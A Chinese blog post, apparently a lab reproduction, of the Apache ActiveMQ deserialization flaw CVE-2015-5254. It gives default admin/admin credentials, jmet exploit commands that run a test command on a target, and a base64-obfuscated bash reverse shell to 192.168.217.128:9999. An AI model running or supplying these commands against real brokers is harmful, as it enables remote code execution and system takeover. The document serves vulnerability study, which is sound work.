Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)

admin 2023年12月29日07:33:55评论57 views字数 674阅读2分14秒阅读模式

CVE-2016-3088

一、环境搭建

Java:jdk8

影响版本 Apache ActiveMQ < 5.13.0

二、用docker搭建漏洞环境

Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)

访问一下web界面

Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)

然后进入admin目录登录

账号:admin

密码:admin

Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)

三、工具准备

  1. cd /opt

  2. wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

  3. mkdir external

Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)

注意:一定要下载external,否则会报错

四、测试漏洞存在

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME 8.210.152.234(靶机IP,下图说是自己的ip是错误的) 61616


Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)

点击触发命令执行

Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)
Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)

查看一下目录,发现创建成功


Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)

五、getshell

首先借用一个网站对payload进行处理,网址我以前的文章复现有提到。


Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxNy4xMjgvOTk5OSAwPiYxIA==}|{base64,-d}|{bash,-i}" 192.168.217.128  61616


Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)

最后点击它,触发命令执行

Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)
Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)
Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)

如上图所示即反弹shell成功!


原文始发于微信公众号(黄公子学安全):Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月29日07:33:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)http://cn-sec.com/archives/2346020.html

发表评论

匿名网友 填写信息